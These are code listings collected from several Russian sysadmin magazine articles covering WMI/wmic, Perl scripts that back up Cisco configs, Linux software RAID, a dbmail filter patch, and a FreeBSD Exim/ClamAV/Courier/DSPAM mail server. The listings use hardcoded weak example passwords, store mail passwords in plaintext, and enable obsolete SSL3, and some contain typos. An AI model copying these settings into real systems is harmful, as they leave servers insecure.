Вы всё ещё не используете WMI? Часть I Константин Леонтьев Win32_OperatingSystem.Name="Microsoft Windows XP Professional|C:\\WINDOWS|\\Device\\Harddisk0\\Partition1" process list /? wmic process list /? wmic process list brief wmic process list brief | find "cmd.exe" wmic process where description='cmd.exe' list brief wmic process call /? wmic process where description='cmd.exe' list brief wmic process where processid='****' call terminate(0) wmic process where description='cmd.exe' call terminate(0) wmic /NODE:server01 /USER:DOMAIN\Administrator /PASSWORD:qwerty /PRIVILEGES:ENABLE process where description='cmd.exe' list brief wmic /NODE:@serverslist.txt /USER:DOMAIN\Administrator /PASSWORD:qwerty /PRIVILEGES:ENABLE process where description='cmd.exe' list brief SELECT * FROM Win32_LogicalDisk WHERE FileSystem IS NULL SELECT * FROM Win32_LogicalDisk WHERE FileSystem IS NOT NULL SELECT * FROM Win32_LogicalDisk WHERE FileSystem = "NTFS" SELECT * FROM Win32_DiskDrive WHERE Partitions < 2 OR SectorsPerTrack > 100 SELECT * FROM Win32_LogicalDisk WHERE (Name = "C:" OR Name = "D:") AND FreeSpace > 2000000 AND FileSystem = "NTFS" SELECT * FROM Win32_NTLogEvent WHERE Logfile = 'Application' SELECT * FROM Meta_Class WHERE __Class LIKE %Win32% SELECT * FROM __InstanceCreationEvent WHERE TargetInstance ISA "Win32_NTLogEvent" GROUP WITHIN 600 BY TargetInstance.SourceName HAVING NumberOfEvents > 25 wmic path Win32_LogicalDisk WHERE FileSystem='NTFS' get /value ----------------------------------------------------------------------------------------------------------------- Делаем резервное копирование конфигураций активного сетевого оборудования Андрей Бирюков Листинг 1. Сценарий, устанавливающий соединение по протоколу Telnet #!/usr/bin/perl use Net::Telnet (); $t = new Net::Telnet ; $hostname="10.0.1.11"; $t->open($hostname); $t->waitfor('/login:.*$/'); $t->print("user"); $t->waitfor('/Password:.*$/'); $t->print("password"); Листинг 2. Отправка почтовых сообщений use Mail::Sendmail; %mail = ( To => 'admin@test.local', # кому письмо From => 'ciscobackup@test.local', # от кого Message => "Backup was finished with result:".$result, # текст сообщения SMTP => 'smtp.mail.ru' # SMTP рестранслятор ); sendmail(%mail) or die $Mail::Sendmail::error; Листинг 3. Полный текст сценария use Net::Telnet (); use Mail::Sendmail; $t = new Net::Telnet ; $hostname=”10.0.1.11”; $t->open($hostname); $t->waitfor('/login:.*$/') or die "bad login: ", $t->lastline; $t->print("user"); $t->waitfor('/Password:.*$/') or die "bad password: ", $t->lastline; $t->print("password"); $t->waitfor('/Router>:.*$/') or die "No router user mode: ", $t->lastline; $t->print("enable"); $t->waitfor('/login:.*$/') or die "bad login: ", $t->lastline; $t->print("user"); $t->waitfor('/Password:.*$/') or die "bad password: ", $t->lastline; $t->print("password"); $t->waitfor('/Router#:.*$/') or die "No router privilege mode: ", $t->lastline; $t->print("copy running-config tftp"); $t->waitfor('/Address or name of remote host:.*$/'); or die "Wrong copy format $t->lastline; $t->print("10.0.1.2"); $t->waitfor('/Destination filename:.*$/'); ($sec, $min, $hour, $day, $mon, $year)=gmtime(time); $filename=”config”.$hour.$min.$sec.$day.$mon.$year; $t->print($filename); $result=$t->getline; $t->waitfor('/Router#:.*$/'); $t->print("logout"); %mail = ( To => 'admin@test.local', From => 'ciscobackup@test.local', Message => "Backup was finished with result:".$result, SMTP => 'smtp.mail.ru' ); sendmail(%mail) or die $Mail::Sendmail::error; Листинг 4. Сценарий с подключением по протоколу SSH my ($pty, $ssh, @lines); my $host = "10.0.1.2"; my $user = "user"; my $password = "password"; my $prompt = '/ $/'; $pty = &spawn("ssh", "-l", $user, $host); # spawn() defined below use Net::Telnet (); use Mail::Sendmail; $ssh = new Net::Telnet (-fhopen => $pty, -prompt => $prompt, -telnetmode => 0, -cmd_remove_mode => 1, -output_record_separator => "\r"); ## Соединение с удаленным узлом $ssh->waitfor(-match => '/password: ?$/i', -errmode => "return") or die "problem connecting to host: ", $ssh->lastline; $ssh->print($password); $ssh->waitfor(-match => $ssh->prompt, -errmode => "return") or die "login failed: ", $ssh->lastline; ## Отправляем команды и обрабатываем ответы $ssh->waitfor(-match => '/ Router#: $/i', -errmode => "return") or die " Wrong copy format ", $ssh->lastline; $ssh->cmd("copy running-config tftp"); $ssh->waitfor(-match => '/ Address or name of remote host: $/i', -errmode => "return") or die " Wrong copy format ", $ssh->lastline; $ssh->print(“10.0.1.2”); $ssh->waitfor(-match => '/ Destination filename: $/i', -errmode => "return") or die " Wrong copy format ", $ssh->lastline; ($sec, $min, $hour, $day, $mon, $year)=gmtime(time); $filename=”config”.$hour.$min.$sec.$day.$mon.$year; $ssh->print($filename); $result=$t->lastline; $ssh->waitfor(-match => '/ Router#: $/i', -errmode => "return") or die " Wrong copy format ", $ssh->lastline; $ssh->cmd("logout"); %mail = ( To => 'admin@test.local', From => 'ciscobackup@test.local', Message => "Backup was finished with result:".$result, SMTP => 'smtp.mail.ru' ); sendmail(%mail) or die $Mail::Sendmail::error; exit; } # end main program sub spawn { my(@cmd) = @_; my($pid, $pty, $tty, $tty_fd); use IO::Pty (); $pty = new IO::Pty or die $!; unless ($pid = fork) { # child process die "problem spawning program: $!\n" unless defined $pid; use POSIX (); POSIX::setsid or die "setsid failed: $!"; $tty = $pty->slave; $tty_fd = $tty->fileno; close $pty; open STDIN, "<&$tty_fd" or die $!; open STDOUT, ">&$tty_fd" or die $!; open STDERR, ">&STDOUT" or die $!; close $tty; exec @cmd or die "problem executing $cmd[0]\n"; } $pty; 30 2 * * perl /tmp/telnet.pl 50 18 1,15 * perl /tmp/ssh.pl ----------------------------------------------------------------------------------------------------------------- Современный Linux-сервер: как планировать дисковые ресурсы Алексей Барабанов # fdisk -l /dev/sda # fsck /dev/sda3 # mdadm -C /dev/md3 -l 1 -n 2 /dev/sda3 missing # fsck /dev/md3 # e2fsck -f /dev/sda3 # resize2fs /dev/sda3 $(( 2622592 * 4 ))K # e2fsck -f /dev/md3 # mount /dev/md3 /mnt # mount | grep md3 # perl -i.orig -p -e 's,/dev/sda3,/dev/md3,g' /mnt/etc/fstab # cat /mnt/etc/fstab | grep md3 # fdisk /dev/sda <mailbox); trace(TRACE_DEBUG, "%s, %s: calling sort_and_deliver for useridnr [%llu]", __FILE__, __func__, useridnr); dsn_result = sort_and_deliver(tmpmsgidnr, msgsize, useridnr, db_get_mailbox_from_filters(useridnr, headerfields, delivery->mailbox)); char *db_get_mailbox_from_filters(u64_t useridnr, struct list *headerfields, const char *mailbox); CREATE TABLE dbmail_filters ( user_id INT8 REFERENCES dbmail_users(user_idnr) ON DELETE CASCADE ON UPDATE CASCADE, filter_id INT8, filter_field varchar(128) NOT NULL, filter_value varchar(255) NOT NULL, mailbox varchar(100) NOT NULL, PRIMARY KEY (user_id, filter_id) ); CREATE INDEX dbmail_user_id_idx ON dbmail_filters(user_id); CREATE INDEX dbmail_filter_id_idx ON dbmail_filters(filter_id); char *db_get_mailbox_from_filters(u64_t useridnr, struct list *headerfields, const char *mailbox) { trace(TRACE_MESSAGE, "%s, %s: default mailbox [%s]", __FILE__, __func__, mailbox); if (mailbox == NULL) { unsigned i = 0; unsigned num_filters = 0; snprintf(query, DEF_QUERYSIZE, "SELECT filter_field, filter_value, mailbox FROM dbmail_filters WHERE user_id = '%llu' ORDER BY filter_id", useridnr); if (db_query(query) == -1) { trace(TRACE_ERROR, "%s,%s: error gettings filters for " "user_id [%llu]", __FILE__, __func__, useridnr); return NULL; } num_filters = db_num_rows(); for (i = 0; i < num_filters; i++) { struct element *el = list_getstart(headerfields); char *filter_field = db_get_result(i, 0); char *filter_value = db_get_result(i, 1); char *mailbox = db_get_result(i, 2); trace(TRACE_MESSAGE, "%s, %s: processing filter [%s : \"%s\" => %s]", __FILE__, __func__, filter_field, filter_value, mailbox); while (el) { struct mime_record *record = (struct mime_record *) el->data; trace(TRACE_MESSAGE, "%s, %s: processing header [%s : \"%s\"]", __FILE__, __func__, record->field, record->value); if (!strcmp(record->field, filter_field) && strstr(record->value, filter_value)) { trace(TRACE_MESSAGE, "%s, %s: header [%s : \"%s\"] accept filter [%s : \"%s\" => %s]", __FILE__, __func__, record->field, record->value, filter_field, filter_value, mailbox); return mailbox; } el = el->nextnode; } trace(TRACE_MESSAGE, "%s, %s: no header accept filter [%s : \"%s\" => %s]", __FILE__, __func__, filter_field, filter_value, mailbox); } db_free_result(); return NULL; } else { return mailbox; } } # psql -U dbmail dbmail dbmail=# select * from dbmail_filters; ----------------------------------------------------------------------------------------------------------------- Штопаем дыры в Ilohamail Сергей Супрунов Options Indexes Order allow,deny Deny from all ----------------------------------------------------------------------------------------------------------------- Строим мультидоменный почтовый сервер с защитой от вирусов и спама Павел Семенец # cd /usr/ports/databases/mysql41-server/ # make WITH_CHARSET=koi8_ru WITH_CHARSET=cp1251 WITH_CHARSET=utf8 WITH_CHARSET=latin1 WITH_XCHARSET=all all install clean # cd /usr/local/etc/rc.d/ # mv 000.mysql-client.sh 010.mysqlc.sh # mv mysql-server.sh 015.mysqls.sh mysql_enable="YES" mysql_dbdir="/usr/local/database/mysql" # mkdir -p /usr/local/database/mysql # chown -R mysql:mysql /usr/local/database/mysql # /usr/local/etc/rc.d/010.mysqlc.sh start # /usr/local/etc/rc.d/015.mysqls.sh start # /usr/local/bin/mysqladmin -u root password 'testpassword'; # mysql -u root -ptestpassword mysql> drop database test; mysql> use mysql; mysql> delete from db; mysql> delete from user where not (user='root' and host='localhost'); mysql> create database mail; mysql> grant all on mail.* to exim@localhost identified by 'youpassword'; mysql> \q # cd /usr/ports/mail/exim # make fetch # cd /usr/ # mkdir Install # cd Install # tar -xvjpf /usr/ports/distfiles/exim/exim-4.53.tar.bz2 # cd exim-4.53/Local # pw adduser exim -g mail -d /var/spool/mqueue -C "Exim Server" -s /usr/sbin/nologin #cat > Makefile << "EOF" BIN_DIRECTORY=/usr/sbin CONFIGURE_FILE=/etc/mail/exim.conf EXIM_USER=1001 EXIM_GROUP=6 SPOOL_DIRECTORY=/var/spool/mqueue SUPPORT_MAILDIR=yes LOOKUP_MYSQL=yes LOOKUP_INCLUDE=-I /usr/local/include/mysql LOOKUP_LIBS=-L/usr/local/lib/mysql -lmysqlclient -lz -lcrypt -lm AUTH_CRAM_MD5=yes AUTH_PLAINTEXT=yes SUPPORT_TLS=yes TLS_LIBS=-lssl -lcrypto TLS_INCLUDE=-I/usr/include/openssl LOG_FILE_PATH=syslog EXIM_PERL=perl.o SYSTEM_ALIASES_FILE=/etc/mail/aliases CHOWN_COMMAND=/usr/sbin/chown SUPPORT_MOVE_FROZEN_MESSAGES=yes ROUTER_ACCEPT=yes ROUTER_DNSLOOKUP=yes ROUTER_IPLITERAL=yes ROUTER_MANUALROUTE=yes ROUTER_QUERYPROGRAM=yes ROUTER_REDIRECT=yes TRANSPORT_APPENDFILE=yes TRANSPORT_AUTOREPLY=yes TRANSPORT_PIPE=yes TRANSPORT_SMTP=yes HEADERS_CHARSET="CP1251" HAVE_ICONV=yes CFLAGS=-O -I/usr/local/include EXTRALIBS_EXIM=-L/usr/local/lib -liconv INFO_DIRECTORY=/usr/share/info COMPRESS_COMMAND=/usr/bin/gzip COMPRESS_SUFFIX=gz ZCAT_COMMAND=/usr/bin/zcat TMPDIR="/tmp" WITH_CONTENT_SCAN=yes WITH_OLD_DEMIME=yes EOF # cd ../ # make # make install # ln -fs /usr/sbin/exim /usr/lib/sendmail # ln -fs /usr/sbin/exim /usr/sbin/sendmail # ln -fs /usr/sbin/exim /usr/bin/mailq # ln -fs /usr/sbin/exim /usr/bin/runq # strip /usr/sbin/exim* # cd /usr/local/databases # cat > exim.sql << "EOF" -- Таблица алиасов CREATE TABLE `aliases` ( `local_part` varchar(64) NOT NULL default '', `domain` varchar(128) NOT NULL default '', `recipients` text, PRIMARY KEY (`local_part`,`domain`) ) ENGINE=MyISAM DEFAULT CHARSET=cp1251; -- Данные о алиасах INSERT INTO `aliases` VALUES ('root', 'test.com', 'user'); INSERT INTO `aliases` VALUES ('postmaster', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('mailer-daemon', 'test.com', 'postmaster'); INSERT INTO `aliases` VALUES ('uucp', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('operator', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('abuse', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('webmaster', 'test.com', 'root'); INSERT INTO `aliases` VALUES ('hostmaster', 'test.com', 'root'); -- Таблица описания доменов CREATE TABLE `domains` ( `domain` varchar(128) NOT NULL default '', `type` enum('LOCAL','RELAY','VIRTUAL') default 'LOCAL', PRIMARY KEY (`domain`) ) ENGINE=MyISAM DEFAULT CHARSET=cp1251; -- Данные о доменах INSERT INTO `domains` VALUES ('test.com', 'LOCAL'); -- Таблица форвардинга почты CREATE TABLE `userforward` ( `local_part` varchar(64) NOT NULL default '', `domain` varchar(128) NOT NULL default '', `recipients` text, PRIMARY KEY (`local_part`,`domain`) ) ENGINE=MyISAM DEFAULT CHARSET=cp1251; -- Таблица описания пользователей CREATE TABLE `users` ( `id` varchar(64) NOT NULL default '', `crypt` varchar(64) NOT NULL default '', `passwd` varchar(64) NOT NULL default '', `uid` int(10) unsigned default '8', `gid` int(10) unsigned default '12', `mbox_host` varchar(128) NOT NULL default 'test.com', `shell` varchar(32) character set cp1251 collate cp1251_bin default '/sbin/nologin', `home` varchar(128) character set cp1251 collate cp1251_bin default '/usr/local/vmail/test.com', `quota` tinyint(4) default '30', `active` enum('Y','N') default 'Y', PRIMARY KEY (`id`,`mbox_host`) ) ENGINE=MyISAM DEFAULT CHARSET=cp1251; INSERT INTO `users` VALUES ('user', ENCRYPT('password'), 'password', 1001, 6, 'test.com','/usr/sbin/nologin','/usr/local/vmail/test.com/user', 127, 'Y'); EOF # mysql -u root -ptestpassword exim < exim.sql # mysql -u root -ptestpassword mysql> use exim mysql> ./exim.sql mysql> \q # cd /etc/mail/ # mkdir ssl # cd ssl # openssl req -x509 -newkey rsa:1024 -keyout mail.pem -out mail.pem -days 3650 -nodes # chmod 400 mail.pem # chown exim:mail mail.pem #cat > exim.conf << "EOF" primary_hostname = mail.test.com # Домены, для которых принимаем почту domainlist local_domains = ${lookup mysql{SELECT domain FROM domains WHERE domain='${domain}' AND (type='LOCAL' OR type='VIRTUAL')}} # Домены, которым разрешено отправлять почту через данный сервер domainlist relay_to_domains = ${lookup mysql{SELECT domain FROM domains WHERE domain='${domain}' AND type='RELAY'}} # Включаем проверку на вирусы hostlist relay_from_hosts = 127.0.0.1 av_scanner = clamd:127.0.0.1 3310 # Включаем проверку по содержимому письма acl_smtp_rcpt = acl_check_rcpt acl_smtp_data = acl_check_virus qualify_domain = test.com auth_advertise_hosts = * daemon_smtp_ports = 25 : 465 # Включаем SSL-соединение tls_on_connect_ports = 465 tls_advertise_hosts = * tls_certificate = /etc/mail/ssl/mail.pem tls_privatekey = /etc/mail/ssl/mail.pem # Включаем лог действий сервера log_selector = \ +all_parents \ +lost_incoming_connection \ +received_sender \ +received_recipients \ +smtp_confirmation \ +smtp_syntax_error \ +smtp_protocol_error \ -queue_run allow_domain_literals = false # Запрещаем привелигированным пользователям отправлять почту через данный сервер never_users = root:daemon:bin # Нет, им просто запрещается отправлять почту и все host_lookup = * rfc1413_hosts = * rfc1413_query_timeout = 0s ignore_bounce_errors_after = 30m timeout_frozen_after = 3d freeze_tell = postmaster auto_thaw = 1h message_size_limit = 10M smtp_accept_max = 50 smtp_accept_max_per_connection = 50 smtp_connect_backlog = 50 smtp_accept_max_per_host = 25 split_spool_directory = true remote_max_parallel = 15 # Подключем базу MySQL hide mysql_servers = localhost/mail/exim/youpassowrd # Подключаем фильтры begin acl acl_check_rcpt: deny local_parts = ^.*[@%!/|] : ^\\. accept local_parts = postmaster domains = +local_domains require verify = sender deny message = HELO/EHLO required by SMTP RFC condition = ${if eq{$sender_helo_name}{}{yes}{no}} deny message = Go Away! You are spammer. condition = ${if match{$sender_host_name}{bezeqint\\.net|net\\.il|dialup|dsl|pool|peer|dhcp}{yes}{no}} deny message = host is listed in $dnslist_domain dnslists = sbl.spamhaus.org : \ relays.ordb.org : \ opm.blitzed.org : \ proxies.blackholes.easynet.nl accept domains = +local_domains endpass message = unknown user verify = recipient accept domains = +relay_to_domains endpass message = unrouteable address verify = recipient accept hosts = +relay_from_hosts accept authenticated = * deny message = relay not permitted acl_check_virus: deny message = Messege rejected: Virus $malware_name) Found. Your message was successfully trashed. malware = * accept # Описываем транспорты и и роутеры begin routers dnslookup: driver = dnslookup domains = ! +local_domains transport = remote_smtp ignore_target_hosts = 0.0.0.0 : 127.0.0.0/8 no_more system_aliases: driver = redirect allow_fail allow_defer data = ${lookup mysql{SELECT recipients FROM aliases WHERE local_part='${local_part}' AND domain='${domain}'}} userforward: driver = redirect allow_fail allow_defer data = ${lookup mysql{SELECT recipients FROM userforward WHERE local_part='${local_part}' AND domain='${domain}'}} mysqluser: driver = accept condition = ${if eq{} {${lookup mysql{SELECT home FROM users WHERE id='${local_part}' AND mbox_host='${domain}' AND active='Y'}}}{no}{yes}}transport = mysql_delivery begin transports remote_smtp: driver = smtp mysql_delivery: driver = appendfile check_string = "" create_directory delivery_date_add directory = ${lookup mysql{SELECT CONCAT(home, "/Maildir") FROM users WHERE id='${local_part}' AND mbox_host='${domain}'}} directory_mode = 770 envelope_to_add group = mail maildir_format maildir_tag = ,S=$message_size message_prefix = "" message_suffix = "" mode = 0600 quota = ${lookup mysql{SELECT quota FROM users WHERE id='${local_part}' AND mbox_host='${domain}'}{${value}M}} quota_size_regex = S=(\d+)$ quota_warn_threshold = 95% return_path_add address_pipe: driver = pipe return_output address_file: driver = appendfile delivery_date_add envelope_to_add return_path_add address_reply: driver = autoreply begin retry * quota * F,2h,15m; G,16h,1h,1.5; F,4d,6h begin rewrite # Включаем аутентификацию begin authenticators # Метод - Plain auth_plain: driver = plaintext public_name = PLAIN server_condition = ${lookup mysql{SELECT id FROM users WHERE id = '${quote_mysql:${local_part:$2}}' AND mbox_host = '${quote_mysql:${domain:$2}}' AND passwd = '${quote_mysql:$3}' AND active = 'Y'}{yes}{no}} server_prompts = : server_set_id = $2 # Метод - Login auth_login: driver = plaintext public_name = LOGIN server_condition = ${lookup mysql{SELECT id FROM users WHERE id = '${quote_mysql:${local_part:$1}}' AND mbox_host = '${quote_mysql:${domain:$1}}' AND passwd = '${quote_mysql:$2}' AND active = 'Y'}{yes}{no}} server_prompts = Username:: : Password:: server_set_id = $1 #Метод - Cram-MD5 auth_cram_md5: driver = cram_md5 public_name = CRAM-MD5 server_secret = ${lookup mysql{SELECT passwd FROM users WHERE id = '${quote_mysql:${local_part:$1}}' AND mbox_host = '${quote_mysql:${domain:$1}}' AND active = 'Y'}{$value}fail} server_set_id = $1 EOF # cd /usr/ports/security/clamav # make all install clean # cd /usr/local/etc # cat > clamd.conf << "EOF" LogFile /var/log/clamav/clamd.log LogTime LogClean LogSyslog PidFile /var/run/clamav/clamd.pid TemporaryDirectory /var/tmp DatabaseDirectory /var/db/clamav FixStaleSocket TCPSocket 3310 TCPAddr 127.0.0.1 User clamav AllowSupplementaryGroups ScanPE ScanOLE2 ScanMail ScanHTML ScanArchive ScanRAR ArchiveMaxFiles 10000 EOF # cat > freshclam.conf << "EOF" DatabaseDirectory /var/db/clamav UpdateLogFile /var/log/clamav/freshclam.log LogVerbose PidFile /var/run/clamav/freshclam.pid DatabaseOwner clamav AllowSupplementaryGroups DatabaseMirror database.clamav.net MaxAttempts 5 Checks 3 NotifyClamd EOF # cd /usr/local/etc/rc.d # mv clamav-clamd.sh 020.clamav.sh # mv clamav-freshclam.sh 025.freshclam.sh clamav_freshclam_enable="YES" clamav_clamd_enable="YES" # ./020.clamav.sh start # ./025.freshclam.sh start # mkdir -p /usr/local/vmail # chown -R exim:mail /usr/local/vmail /var/spool/mqueue # chmod 0770 /usr/local/vmail # cat > /usr/local/etc/rc.d/030.exim.sh << "EOF" # !/bin/sh case "$1" in start) echo "starting Exim..." /usr/sbin/exim -bd -q15m ;; restart) echo "restarting Exim..." kill -HUP `cat /var/spool/mqueue/exim-daemon.pid` ;; stop) echo "stopping Exim..." kill -TERM `cat /var/spool/mqueue/exim-daemon.pid` ;; *) echo "Usage: $0 {start|stop|restart}" exit 1 ;; esac EOF # chmod +x /usr/local/etc/rc.d/030.exim.sh # /usr/local/etc/rc.d/030.exim.sh start # /usr/local/etc/rc.d/030.exim.sh start # perl -MMIME::Base64 -e 'print encode_base64("user\@test.com\0user\@test.com\0password");' # telnet 127.0.0.1 25 # perl -MMIME::Base64 -e 'print encode_base64("user\@test.com");' # perl -MMIME::Base64 -e 'print encode_base64("password");' # telnet 127.0.0.1 25 # telnet 127.0.0.1 25 # perl -MMIME::Base64 -e 'print MIME::Base64::decode_base64(shift), "\n"' PDUwNy4xMTI5Nzk3MzkyQG1haWwucnVzZ2F0ZS5vcmc+ # perl -MMIME::Base64 -MDigest::HMAC_MD5 -e 'print MIME::Base64::encode_base64($ARGV[0] . " " . Digest::HMAC_MD5::hmac_md5_hex($ARGV[2], $ARGV[1]))' 'user@test.ru' 'password' '<507.1129797392@mail.test.com>' # openssl OpenSSL> s_client -host localhost -port 465 # cd /usr/ports/mail/courier-imap # make all install clean # cd /usr/local/etc/authlib # cat > authdaemonrc << "EOF" authmodulelist="authmysql" authmodulelistorig="authuserdb authvchkpw authpam authldap authmysql authpgsql" daemons=5 authdaemonvar=/var/run/authdaemond subsystem=mail DEBUG_LOGIN=0 DEFAULTOPTIONS="wbnodsn=1" LOGGEROPTS="" EOF #cat > authmysqlrc << "EOF" MYSQL_SERVER localhost MYSQL_USERNAME exim MYSQL_PASSWORD youpassowrd MYSQL_PORT 3306 MYSQL_OPT 0 MYSQL_DATABASE mail MYSQL_SELECT_CLAUSE SELECT CONCAT(id,'@',mbox_host), crypt, "", 1001, 6, home, CONCAT(home,'/Maildir'), "", id, "" FROM users WHERE CONCAT(id,'@', mbox_host) = ‘'$(local_part)@$(domain)’' EOF # cd /usr/local/etc/courier-imap # cat > pop3d << "EOF" PIDFILE=/var/run/pop3d.pid MAXDAEMONS=40 MAXPERIP=4 POP3AUTH="" POP3AUTH_ORIG="PLAIN LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256" POP3AUTH_TLS="" POP3AUTH_TLS_ORIG="LOGIN PLAIN" POP3_PROXY=0 PORT=110 ADDRESS=0 TCPDOPTS="-nodnslookup -noidentlookup" LOGGEROPTS="-name=pop3d" POP3DSTART=YES MAILDIRPATH=Maildir EOF # cat > imapd << "EOF" ADDRESS=0 PORT=143 MAXDAEMONS=40 MAXPERIP=4 PIDFILE=/var/run/imapd.pid TCPDOPTS="-nodnslookup -noidentlookup" LOGGEROPTS="-name=imapd" IMAP_CAPABILITY="IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE" IMAP_KEYWORDS=1 IMAP_CAPABILITY_ORIG="IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA AUTH=CRAM-MD5 AUTH=CRAM-SHA1 AUTH=CRAM-SHA256 IDLE" IMAP_PROXY=0 IMAP_PROXY_FOREIGN=0 IMAP_IDLE_TIMEOUT=60 IMAP_CAPABILITY_TLS="$IMAP_CAPABILITY AUTH=PLAIN" IMAP_CAPABILITY_TLS_ORIG="$IMAP_CAPABILITY_ORIG AUTH=PLAIN" IMAP_DISABLETHREADSORT=0 IMAP_CHECK_ALL_FOLDERS=0 IMAP_OBSOLETE_CLIENT=0 IMAP_UMASK=022 IMAP_ULIMITD=65536 IMAP_USELOCKS=1 IMAP_SHAREDINDEXFILE=/usr/local/etc/courier-imap/shared/index IMAP_ENHANCEDIDLE=0 IMAP_TRASHFOLDERNAME=Trash IMAP_EMPTYTRASH=Trash:7 IMAP_MOVE_EXPUNGE_TO_TRASH=0 SENDMAIL=/usr/sbin/sendmail HEADERFROM=X-IMAP-Sender IMAPDSTART=YES MAILDIRPATH=Maildir EOF # cat > imapd.cnf << "EOF" RANDFILE = /usr/local/share/courier-imap/imapd.rand [ req ] default_bits = 1024 encrypt_key = yes distinguished_name = req_dn x509_extensions = cert_type prompt = no [ req_dn ] C=RU ST=Russia Federaton L=Moscow O=Exim Super Server OU=IT DEpartament CN=mail.test.com emailAddress=abuse@test.com [ cert_type ] nsCertType = server RANDFILE = /usr/local/share/courier-imap/pop3d.rand # cd /usr/local/share/courier-imap # ./mkimapdcert # ./mppop3dcert # cd /usr/local/etc/courier-imap # mkdir ssl && cd ssl # cp /usr/local/share/courier-imap/*.pem . # cd ../ # cat > imapd-ssl << "EOF" SSLPORT=993 SSLADDRESS=0 SSLPIDFILE=/var/run/imapd-ssl.pid SSLLOGGEROPTS="-name=imapd-ssl" IMAPDSSLSTART=YES IMAPDSTARTTLS=YES IMAP_TLS_REQUIRED=0 COURIERTLS=/usr/local/bin/couriertls TLS_PROTOCOL=SSL3 TLS_STARTTLS_PROTOCOL=TLS1 TLS_CERTFILE=/usr/local/etc/courier-imap/ssl/imapd.pem TLS_VERIFYPEER=NONE TLS_CACHEFILE=/usr/local/var/couriersslcache TLS_CACHESIZE=524288 MAILDIRPATH=Maildir EOF # cat > pop3d-ssl << "EOF" SSLPORT=995 SSLADDRESS=0 SSLPIDFILE=/var/run/pop3d-ssl.pid SSLLOGGEROPTS="-name=pop3d-ssl" POP3DSSLSTART=YES POP3_STARTTLS=YES POP3_TLS_REQUIRED=0 COURIERTLS=/usr/local/bin/couriertls TLS_PROTOCOL=SSL3 TLS_STARTTLS_PROTOCOL=TLS1 TLS_CERTFILE=/usr/local/etc/courier-imap/ssl/pop3d.pem TLS_VERIFYPEER=NONE TLS_CACHEFILE=/usr/local/var/couriersslcache TLS_CACHESIZE=524288 MAILDIRPATH=Maildir EOF # cd /usr/local/etc/rc.d # mv courier_authdaemond.sh 035.courier-auth.sh # mv courier_imap_imapd.sh 040.courier-imap.sh # mv courier_imap_pop3d.sh 045.courier-pop3d.sh # mv courier_imap_imapd_ssl 050.courier-imaps.sh # mv courier_imap_pop3d_ssl 055.courier_pop3ds.sh courier_authdaemond_enable-"YES" courier_imap_imapd_enable-"YES" courier_imap_pop3d_enable-"YES" courier_imap_imapd_ssl_enable-"YES" courier_imap_pop3d_ssl_enable-"YES" # /usr/local/etc/rc.d/035.courier-auth.sh start # /usr/local/etc/rc.d/040.courier-imapd.sh start # /usr/local/etc/rc.d/045.courier-pop3d.sh start # /usr/local/etc/rc.d/050.courier-imaps.sh start # /usr/local/etc/rc.d/055.courier-pop3ds.sh start # telnet 127.0.0.1 110 # telnet 127.0.0.1 143 # openssl OpenSSL> s_client -host localhost -port 995 OpenSSL> s_client -host localhost -port 993 # cd /usr/ports/mail/dspam # make fetch # cd /usr/Install # tar -xvzf /usr/ports/distfiles/dspam-3.4.8.tar.gz # cd dspam-3.4.8 # ./configure -prefix=/usr/local/dspam \ --includedir=/usr/local/dspam/include \ --mandir=/usr/local/dspam/share/man \ --infodir=/usr/local/dspam/share/info \ --sysconfdir=/usr/local/dspam/etc \ --localstatedir=/usr/local/dspam/var \ --libexecdir=/usr/local/dspam/lib \ --with-dspam-home=/usr/local/dspam/var/spool \ --enable-debug \ --enable-domain-scale \ --enable-signature-headers \ --with-delivery-agent="/usr/sbin/exim -oi -oMr spam-scanned" \ --enable-whitelist \ --enable-virtual-users \ --enable-experimental \ --with-logdir=/var/log/dspam \ --enable-neural-networking \ --with-storage-driver=mysql_drv \ --with-mysql-includes=/usr/local/include/mysql \ --with-mysql-libraries=/usr/local/lib/mysql \ --enable-preferences-extension # make # make install # cd /usr/local/dspam/etc/ # cat > dspam.conf << "EOF" # Домашняя директория DSPM для работы сервиса Home /usr/local/dspam/var/spool # Агент для обработки почты TrustedDeliveryAgent "/usr/sbin/exim -oi -oMr spam-scanned" OnFail error # Пользователи с привилегиями которых может работать DSPAM Trust exim Trust root Trust mail Trust mailnull Trust smmsp Trust daemon # Включаем отладку Debug * # Включаем самообучение TrainingMode teft Feature chained Feature tb=5 Feature whitelist # Включаем алгоритмы проверки писем Algorithm graham burton PValue graham Preference "spamAction=quarantine" Preference "signatureLocation=message" # 'message' or 'headers' Preference "showFactors=on" AllowOverride trainingMode AllowOverride spamAction spamSubject AllowOverride statisticalSedation AllowOverride enableBNR AllowOverride enableWhitelist AllowOverride signatureLocation AllowOverride showFactors AllowOverride optIn optOut AllowOverride whitelistThreshold # Описываем подключение к базе данных MySQLServer localhost MySQLPort 3306 MySQLUser exim MySQLPass youpassword MySQLDb dspam MySQLCompress true Notifications on PurgeSignatures 14 PurgeNeutral 90 PurgeUnused 90 PurgeHapaxes 30 PurgeHits1S 15 PurgeHits1I 15 LocalMX 127.0.0.1 SystemLog on UserLog on Opt out EOF # mysql -u root -ppassword mysql> create database dspam; mysql> grant all on dspam.* to exim@localhost identified by 'youpassword'; mysql> \quit # cd /usr/Install/dspam-3.4.8/src/tools.mysql_drv # mysql -u exim -pyoupassowrd dspam < mysql_objects-4.1.sql # mysql -u exim -pyoupassowrd dspam < neural.sql # mysql -u exim -pyoupassowrd dspam < virtual_users.sql dspam_addspam: driver = accept expn = false domains = +local_domains local_parts = spam transport = addspam headers_add = "X-DSPAM-REPORT: Missclassified" dspam_falsepositive: driver = accept expn = false domains = +local_domains local_parts = ham:nospam transport = falsepositive headers_add = "X-DSPAM-REPORT: Falsepositive" spamscan_router: no_verify headers_remove = X-FILTER-SPAM : X-Spam-Score : X-Spam-Score-Gate : X-Spam-Report : X-Spam-Gate-Subject : X-Spam-Flag : X-S condition = "${if and {{!eq{$received_protocol}{spam-scanned}} {!def:h_X-FILTER-SPAM:}} {1}{0}}" driver = accept headers_add = X-FILTER-SPAM: 